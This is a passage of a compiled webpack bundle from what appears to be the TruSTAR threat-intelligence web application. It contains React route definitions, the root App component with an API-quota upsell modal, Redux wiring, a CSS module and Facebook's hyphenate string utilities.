          { path: 'create', component: __WEBPACK_IMPORTED_MODULE_5__BundleCreator__["h" /* CreateContainer */] },
          __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["IndexRoute"], { component: __WEBPACK_IMPORTED_MODULE_5__BundleCreator__["i" /* CreateForm */] }),
          __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["Route"], { path: 'review', component: __WEBPACK_IMPORTED_MODULE_5__BundleCreator__["F" /* Review */] })
        ),
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["Route"], { path: 'create/iocs', component: __WEBPACK_IMPORTED_MODULE_5__BundleCreator__["j" /* CreateIndicators */] }),
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
          __WEBPACK_IMPORTED_MODULE_2_react_router__["Route"],
          { path: 'update/:id', component: __WEBPACK_IMPORTED_MODULE_5__BundleCreator__["P" /* UpdateContainer */] },
          __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["IndexRoute"], { component: __WEBPACK_IMPORTED_MODULE_5__BundleCreator__["i" /* CreateForm */] }),
          __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["Route"], { path: 'review', component: __WEBPACK_IMPORTED_MODULE_5__BundleCreator__["F" /* Review */] })
        ),
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
          __WEBPACK_IMPORTED_MODULE_2_react_router__["Route"],
          {
            path: 'update/:id/enclave/:destEnclaveGuid',
            component: __WEBPACK_IMPORTED_MODULE_5__BundleCreator__["P" /* UpdateContainer */] },
          __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["IndexRoute"], { component: __WEBPACK_IMPORTED_MODULE_5__BundleCreator__["i" /* CreateForm */] }),
          __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["Route"], { path: 'review', component: __WEBPACK_IMPORTED_MODULE_5__BundleCreator__["F" /* Review */] })
        ),
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
          __WEBPACK_IMPORTED_MODULE_2_react_router__["Route"],
          { path: 'settings', component: __WEBPACK_IMPORTED_MODULE_5__BundleCreator__["I" /* SettingsContainer */] },
          __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["IndexRedirect"], { to: 'profile' }),
          __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["Route"], { path: 'profile', component: __WEBPACK_IMPORTED_MODULE_5__BundleCreator__["C" /* ProfileSettings */] }),
          __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["Route"], { path: 'users', component: __WEBPACK_IMPORTED_MODULE_5__BundleCreator__["Q" /* UsersContainer */] }),
          __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["Route"], { path: 'api', component: __WEBPACK_IMPORTED_MODULE_5__BundleCreator__["b" /* ApiSettingsContainer */] }),
          __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["Route"], { path: 'email', component: __WEBPACK_IMPORTED_MODULE_5__BundleCreator__["l" /* EmailSettingsContainer */] }),
          __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["Route"], { path: 'redaction', component: __WEBPACK_IMPORTED_MODULE_5__BundleCreator__["D" /* RedactionLibrary */] }),
          __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["Route"], { path: 'templates', component: __WEBPACK_IMPORTED_MODULE_5__BundleCreator__["L" /* TemplatesContainer */] }),
          __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["Route"], { path: 'subscriptions', component: __WEBPACK_IMPORTED_MODULE_5__BundleCreator__["K" /* SubscriptionsContainer */] }),
          __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["Route"], { path: 'enclaves', component: __WEBPACK_IMPORTED_MODULE_5__BundleCreator__["m" /* EnclavesContainer */] }),
          __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["Route"], { path: 'users', component: __WEBPACK_IMPORTED_MODULE_5__BundleCreator__["Q" /* UsersContainer */] }),
          __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
            __WEBPACK_IMPORTED_MODULE_2_react_router__["Route"],
            { component: __WEBPACK_IMPORTED_MODULE_4__components_ConnectedDesignProvider__["a" /* default */] },
            __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["Route"], { path: 'whitelist', component: __WEBPACK_IMPORTED_MODULE_5__BundleCreator__["f" /* CompanyWhitelist */] }),
            __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["Route"], { path: 'global-whitelist', component: __WEBPACK_IMPORTED_MODULE_5__BundleCreator__["r" /* GlobalWhitelist */] }),
            __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["Route"], { path: 'malware', component: __WEBPACK_IMPORTED_MODULE_5__BundleCreator__["v" /* MalwareContainer */] }),
            __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["Route"], { path: 'threat-actors', component: __WEBPACK_IMPORTED_MODULE_5__BundleCreator__["O" /* ThreatActorsContainer */] })
          ),
          __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["Route"], { path: 'companies', component: __WEBPACK_IMPORTED_MODULE_5__BundleCreator__["e" /* CompaniesContainer */] }),
          __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["Route"], { path: 'sharing-groups', component: __WEBPACK_IMPORTED_MODULE_5__BundleCreator__["J" /* SharingGroupsContainer */] }),
          __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["Route"], { path: 'notifications', component: __WEBPACK_IMPORTED_MODULE_5__BundleCreator__["z" /* NotificationSettings */] })
        ),
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["Redirect"], { from: 'pages', to: '/pages/help' }),
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
          __WEBPACK_IMPORTED_MODULE_2_react_router__["Route"],
          { path: 'pages', component: __WEBPACK_IMPORTED_MODULE_5__BundleCreator__["A" /* PageContainer */] },
          __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["Route"], { path: 'about', component: __WEBPACK_IMPORTED_MODULE_5__BundleCreator__["a" /* About */] }),
          __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["Route"], { path: 'help', component: __WEBPACK_IMPORTED_MODULE_5__BundleCreator__["s" /* Help */] }),
          __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["Route"], { path: 'terms', component: __WEBPACK_IMPORTED_MODULE_5__BundleCreator__["M" /* Terms */] }),
          __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["Route"], { path: '*', component: __WEBPACK_IMPORTED_MODULE_5__BundleCreator__["y" /* NotFound */] })
        )
      )
    ),
    __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
      __WEBPACK_IMPORTED_MODULE_2_react_router__["Route"],
      { component: __WEBPACK_IMPORTED_MODULE_4__components_ConnectedDesignProvider__["a" /* default */] },
      __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
        __WEBPACK_IMPORTED_MODULE_2_react_router__["Route"],
        { path: 'auth', component: __WEBPACK_IMPORTED_MODULE_5__BundleCreator__["c" /* AuthContainer */] },
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["Route"], { path: 'login', component: __WEBPACK_IMPORTED_MODULE_5__BundleCreator__["t" /* Login */] }),
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["Route"], { path: 'logout', component: __WEBPACK_IMPORTED_MODULE_5__BundleCreator__["u" /* Logout */] }),
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["Route"], { path: 'mfa', component: __WEBPACK_IMPORTED_MODULE_5__BundleCreator__["x" /* Mfa */] }),
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["Route"], { path: 'eula', component: __WEBPACK_IMPORTED_MODULE_5__BundleCreator__["N" /* TermsAgreement */] }),
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["Route"], { path: 'create-password', component: __WEBPACK_IMPORTED_MODULE_5__BundleCreator__["k" /* CreatePassword */] }),
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["Route"], { path: 'forgot-password', component: __WEBPACK_IMPORTED_MODULE_5__BundleCreator__["q" /* ForgotPassword */] }),
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["Route"], { path: 'sso', component: __WEBPACK_IMPORTED_MODULE_5__BundleCreator__["G" /* SSOReceiver */] }),
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["Redirect"], { from: '*', to: 'login' })
      )
    ),
    __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["Route"], { path: '*', component: __WEBPACK_IMPORTED_MODULE_5__BundleCreator__["y" /* NotFound */] })
  );
};

/**
 * The root of the application. This file stands alone so that we can enable HMR
 * and rerender the app root. For the app ENTRY POINT see index.js.
 *
 * NOTE: This component will only render once in prod. Because of this it should
 * be fine to re-create the routes within the render method. In development it
 * will be re-rendered whenever the app changes.
 */

var Root = function (_React$Component) {
  _inherits(Root, _React$Component);

  function Root() {
    _classCallCheck(this, Root);

    return _possibleConstructorReturn(this, (Root.__proto__ || Object.getPrototypeOf(Root)).apply(this, arguments));
  }

  _createClass(Root, [{
    key: 'render',
    value: function render() {
      return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
        __WEBPACK_IMPORTED_MODULE_1_react_redux__["Provider"],
        { store: this.props.store },
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
          __WEBPACK_IMPORTED_MODULE_4__components_ConnectedDesignProvider__["a" /* default */],
          { noBootstrap: true },
          __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
            __WEBPACK_IMPORTED_MODULE_2_react_router__["Router"],
            { history: this.props.history },
            makeRoutes()
          )
        )
      );
    }
  }]);

  return Root;
}(__WEBPACK_IMPORTED_MODULE_0_react__["Component"]);

/* harmony default export */ __webpack_exports__["a"] = (Root);

/***/ }),
/* 3442 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_react_redux__ = __webpack_require__(24);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_classnames_bind__ = __webpack_require__(39);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_classnames_bind___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_classnames_bind__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_trustar_fp__ = __webpack_require__(109);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_4_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_bowser__ = __webpack_require__(328);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_bowser___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_5_bowser__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_6_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_trustar_components__ = __webpack_require__(295);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8_react_router__ = __webpack_require__(98);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9__App_styl__ = __webpack_require__(3649);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9__App_styl___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_9__App_styl__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10_modules_app__ = __webpack_require__(179);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_11_modules_profile__ = __webpack_require__(140);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_12_modules_enclave__ = __webpack_require__(296);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_13_modules_constellation__ = __webpack_require__(403);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_14_modules_sectors__ = __webpack_require__(566);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_15_modules_subscriptions__ = __webpack_require__(407);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_16_modules_subscription_management__ = __webpack_require__(564);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_17_modules_errors__ = __webpack_require__(906);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_18_modules_data_feeds__ = __webpack_require__(298);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_19_trustar_2_0_themes_common_constants__ = __webpack_require__(406);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_20__alerts_FloatingAlertList_js__ = __webpack_require__(3651);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_21__AppHeader_js__ = __webpack_require__(3663);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_22_modules_app_utils__ = __webpack_require__(1636);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_23__browse_Browse__ = __webpack_require__(1491);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_24__components_ConnectedDesignProvider__ = __webpack_require__(563);
var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };

var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }();

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }












var debug = __WEBPACK_IMPORTED_MODULE_4_debug___default()('app:components:App'); // eslint-disable-line no-unused-vars


var cx = __WEBPACK_IMPORTED_MODULE_2_classnames_bind___default.a.bind(__WEBPACK_IMPORTED_MODULE_9__App_styl___default.a);

















var isDev = "production" === 'development';
var browser = Object(__WEBPACK_IMPORTED_MODULE_3_trustar_fp__["IO"])(function () {
  return __WEBPACK_IMPORTED_MODULE_5_bowser___default.a.name;
}).map(__WEBPACK_IMPORTED_MODULE_6_ramda__["toLower"]);

var SuperSpinner = __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
  'div',
  { className: cx('SuperSpinner') },
  __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_7_trustar_components__["s" /* Spinner */], null)
);

var UpsellModal = Object(__WEBPACK_IMPORTED_MODULE_1_react_redux__["connect"])(null, {
  hide: __WEBPACK_IMPORTED_MODULE_11_modules_profile__["actions"].hideUpsellModal
})(function (_ref) {
  var hide = _ref.hide;

  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
    'div',
    { className: cx('UpsellModal') },
    __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement('div', { className: cx('backdrop'), onClick: hide }),
    __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
      'div',
      { className: cx('inner') },
      __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        'p',
        null,
        'You have exceeded your daily API quota. Consider upgrading to increase your quota.',
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          'a',
          { href: 'https://support.trustar.co/article/m5kl5anpiz-api-rate-limit-quota' },
          'Why am I seeing this?'
        )
      ),
      __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        'div',
        { className: cx('buttons') },
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          'a',
          { href: 'https://www.splunk.com/en_us/investor-relations/acquisitions/trustar.html', className: cx('learnMore'), onClick: hide },
          'Upgrade'
        ),
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          'a',
          { href: '#', className: cx('notNow'), onClick: hide },
          'Not Now'
        )
      )
    )
  );
});

/**
 * The App. App gets passed to ReactDOM.render and is the base of the
 * entire app.
 */

var App = function (_React$Component) {
  _inherits(App, _React$Component);

  function App() {
    var _ref2;

    var _temp, _this, _ret;

    _classCallCheck(this, App);

    for (var _len = arguments.length, args = Array(_len), _key = 0; _key < _len; _key++) {
      args[_key] = arguments[_key];
    }

    return _ret = (_temp = (_this = _possibleConstructorReturn(this, (_ref2 = App.__proto__ || Object.getPrototypeOf(App)).call.apply(_ref2, [this].concat(args))), _this), _this.removeTimeoutWarning = function () {
      _this.props.closeTimeoutWarning();
    }, _this.componentDidCatch = function (error, info) {
      if (false) {
        console.error(error, info);
      } else {
        _this.props.throwGlobalError({ error: error, info: info });
      }
    }, _this.handleShortcuts = function (e) {
      if (!isDev) return;
      if (e.shiftKey && e.key === 'D') {
        _this.props.toggleTheme();
      }
    }, _temp), _possibleConstructorReturn(_this, _ret);
  }

  _createClass(App, [{
    key: 'componentDidMount',
    value: function componentDidMount() {
      // Reset the favicon: is this still necessary?
      Object(__WEBPACK_IMPORTED_MODULE_22_modules_app_utils__["b" /* resetFavicon */])();
      this.props.initialize();
      this.props.fetchEnclaves();
      this.props.fetchSectors();
      this.props.initializeProfile();
      this.props.fetchSubscriptions();
      this.props.fetchFeeds();
      if (this.props.isAdmin) {
        this.props.fetchManagement();
      }
    }
  }, {
    key: 'componentWillUnmount',
    value: function componentWillUnmount() {
      if (this.timeout) clearTimeout(this.timeout);
    }
  }, {
    key: 'render',
    value: function render() {
      var _props = this.props,
          options = _props.options,
          isAdmin = _props.isAdmin,
          appLoading = _props.appLoading,
          confirmation = _props.confirmation,
          timeoutWarning = _props.timeoutWarning,
          showUpsellModal = _props.showUpsellModal;

      var theme = options.get('theme');
      var adminClass = isAdmin ? 'isAdmin' : '';
      var browserName = browser.foldOr(function () {
        return 'browser-unknown';
      });

      /* NOTE: We add the _global_ theme class so that we can utilize it from
       * other styl files, not just App.styl
       *
       * NOTE: The browserName is mainly for selective styling in IE. The IE
       * classname is 'msie'. There is also `msedge`. See:
       * https://github.com/ded/bowser#browser-flags
       */

      if (appLoading) return SuperSpinner;

      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        'div',
        {
          id: 'App',
          className: cx('App', theme, adminClass) + (' ' + theme + ' ' + browserName),
          onKeyPress: this.handleShortcuts },
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_21__AppHeader_js__["a" /* default */], null),
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          'div',
          { className: cx('contentArea') },
          __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
            __WEBPACK_IMPORTED_MODULE_24__components_ConnectedDesignProvider__["a" /* default */],
            null,
            __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_23__browse_Browse__["default"], null)
          ),
          __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
            'div',
            { className: cx('routeHandler') },
            this.props.children
          )
        ),
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_20__alerts_FloatingAlertList_js__["a" /* default */], null),
        timeoutWarning && __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_7_trustar_components__["r" /* SessionExpiryWarning */], {
          removeTimeoutWarning: this.removeTimeoutWarning
        }),
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_7_trustar_components__["b" /* ConfirmationModal */], { data: confirmation, confirm: this.props.confirm }),
        showUpsellModal && __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(UpsellModal, { loading: appLoading }),
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement('div', { id: 'portalTarget' })
      );
    }
  }]);

  return App;
}(__WEBPACK_IMPORTED_MODULE_0_react___default.a.Component);

var mapState = function mapState(state) {
  return {
    options: __WEBPACK_IMPORTED_MODULE_10_modules_app__["getters"].options(state),
    appLoading: __WEBPACK_IMPORTED_MODULE_10_modules_app__["getters"].loading(state),
    appTheme: __WEBPACK_IMPORTED_MODULE_10_modules_app__["getters"].theme(state),
    isAdmin: __WEBPACK_IMPORTED_MODULE_11_modules_profile__["getters"].adminRole(state),
    timeoutWarning: __WEBPACK_IMPORTED_MODULE_10_modules_app__["getters"].timeoutWarning(state),
    showUpsellModal: __WEBPACK_IMPORTED_MODULE_11_modules_profile__["getters"].showUpsellModal(state)
  };
};

var dispatchProps = {
  initialize: __WEBPACK_IMPORTED_MODULE_10_modules_app__["actions"].initialize,
  fetchSectors: __WEBPACK_IMPORTED_MODULE_14_modules_sectors__["actions"].fetch,
  fetchEnclaves: __WEBPACK_IMPORTED_MODULE_12_modules_enclave__["actions"].fetch,
  initializeProfile: __WEBPACK_IMPORTED_MODULE_11_modules_profile__["actions"].fetch,
  closeTimeoutWarning: __WEBPACK_IMPORTED_MODULE_10_modules_app__["actions"].closeTimeoutWarning,
  setConstellationOptions: __WEBPACK_IMPORTED_MODULE_13_modules_constellation__["a" /* actions */].setOptions,
  fetchSubscriptions: __WEBPACK_IMPORTED_MODULE_15_modules_subscriptions__["actions"].fetchSubscriptions,
  fetchManagement: __WEBPACK_IMPORTED_MODULE_16_modules_subscription_management__["actions"].fetchSubscriptions,
  fetchFeeds: __WEBPACK_IMPORTED_MODULE_18_modules_data_feeds__["actions"].fetchFeeds,
  setTheme: __WEBPACK_IMPORTED_MODULE_10_modules_app__["actions"].setOptions,
  throwGlobalError: __WEBPACK_IMPORTED_MODULE_17_modules_errors__["a" /* actions */].throwGlobalError,
  updatePreferences: __WEBPACK_IMPORTED_MODULE_11_modules_profile__["actions"].updatePreferences
};

var mergeProps = function mergeProps(stateProps, dispatchProps, ownProps) {
  return _extends({}, ownProps, dispatchProps, stateProps, {
    toggleTheme: function toggleTheme() {
      var updatedTheme = stateProps.theme === __WEBPACK_IMPORTED_MODULE_19_trustar_2_0_themes_common_constants__["b" /* LIGHT_THEME */] ? __WEBPACK_IMPORTED_MODULE_19_trustar_2_0_themes_common_constants__["a" /* DARK_THEME */] : __WEBPACK_IMPORTED_MODULE_19_trustar_2_0_themes_common_constants__["b" /* LIGHT_THEME */];

      dispatchProps.updatePreferences({
        themeMode: updatedTheme.toUpperCase()
      });
    }
  });
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_1_react_redux__["connect"])(mapState, dispatchProps, mergeProps)(App));

/***/ }),
/* 3443 */
/***/ (function(module, exports, __webpack_require__) {

// style-loader: Adds some css to the DOM by adding a <style> tag

// load the styles
var content = __webpack_require__(3444);
if(typeof content === 'string') content = [[module.i, content, '']];
// Prepare cssTransformation
var transform;

var options = {"hmr":true}
options.transform = transform
// add the styles to the DOM
var update = __webpack_require__(28)(content, options);
if(content.locals) module.exports = content.locals;
// Hot Module Replacement
if(false) {
	// When the styles change, update the <style> tags
	if(!content.locals) {
		module.hot.accept("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./InputWithIcon.styl", function() {
			var newContent = require("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./InputWithIcon.styl");
			if(typeof newContent === 'string') newContent = [[module.id, newContent, '']];
			update(newContent);
		});
	}
	// When the module is disposed, remove the <style> tags
	module.hot.dispose(function() { update(); });
}

/***/ }),
/* 3444 */
/***/ (function(module, exports, __webpack_require__) {

exports = module.exports = __webpack_require__(27)(undefined);
// imports


// module
exports.push([module.i, ".InputWithIcon__InputWithIcon__1wtvm- {\n  display: flex;\n  width: 100%;\n}\n.InputWithIcon__InputWithIcon__1wtvm- label {\n  flex-shrink: 0;\n  flex-grow: 0;\n  display: flex;\n  align-items: center;\n  justify-content: center;\n  width: 30px;\n  text-align: center;\n  background: linear-gradient(to bottom, #fcfcfc, #eee);\n  border: 1px solid #d9d9d9;\n  border-right: none;\n  border-radius: 3px 0 0 3px;\n  color: #6b717d;\n  -webkit-user-select: none;\n     -moz-user-select: none;\n      -ms-user-select: none;\n          user-select: none;\n}\n.InputWithIcon__InputWithIcon__1wtvm- input {\n  flex: 1 100%;\n  display: block;\n  width: 100%;\n  margin-bottom: 0;\n  border-radius: 0 3px 3px 0;\n  border-left-color: #d9d9d9;\n}\n.InputWithIcon__InputWithIcon__1wtvm- input:focus {\n  border-left-color: #528bff;\n}\n.InputWithIcon__InputWithIcon__1wtvm- input[disabled] {\n  background: #d7dae0;\n  cursor: not-allowed;\n}\n", ""]);

// exports
exports.locals = {
	"InputWithIcon": "InputWithIcon__InputWithIcon__1wtvm-"
};

/***/ }),
/* 3445 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export AgreementCopy */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__trustar_2_0_components_Eula_EulaArticle__ = __webpack_require__(1632);



var AgreementCopy = function AgreementCopy(props) {
  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_1__trustar_2_0_components_Eula_EulaArticle__["a" /* TermsOfUseLink */], null);
};

/***/ }),
/* 3446 */
/***/ (function(module, exports, __webpack_require__) {

"use strict";
/**
 * Copyright (c) 2013-present, Facebook, Inc.
 *
 * This source code is licensed under the MIT license found in the
 * LICENSE file in the root directory of this source tree.
 *
 * @typechecks
 */



var hyphenate = __webpack_require__(3447);

var msPattern = /^ms-/;

/**
 * Hyphenates a camelcased CSS property name, for example:
 *
 *   > hyphenateStyleName('backgroundColor')
 *   < "background-color"
 *   > hyphenateStyleName('MozTransition')
 *   < "-moz-transition"
 *   > hyphenateStyleName('msTransition')
 *   < "-ms-transition"
 *
 * As Modernizr suggests (http://modernizr.com/docs/#prefixed), an `ms` prefix
 * is converted to `-ms-`.
 *
 * @param {string} string
 * @return {string}
 */
function hyphenateStyleName(string) {
  return hyphenate(string).replace(msPattern, '-ms-');
}

module.exports = hyphenateStyleName;

/***/ }),
/* 3447 */
/***/ (function(module, exports, __webpack_require__) {

"use strict";


/**
 * Copyright (c) 2013-present, Facebook, Inc.
 *
 * This source code is licensed under the MIT license found in the
 * LICENSE file in the root directory of this source tree.
 *
 * @typechecks
 */

var _uppercasePattern = /([A-Z])/g;

/**
 * Hyphenates a camelcased string, for example:
 *
 *   > hyphenate('backgroundColor')
 *   < "background-color"
 *
 * For CSS style names, use `hyphenateStyleName` instead which works properly
 * with all vendor prefixes, including `ms`.
 *
 * @param {string} string
 * @return {string}
 */
function hyphenate(string) {
  return string.replace(_uppercasePattern, '-$1').toLowerCase();
}

module.exports = hyphenate;

/***/ }),
/* 3448 */
/***/ (function(module, exports, __webpack_require__) {

/*
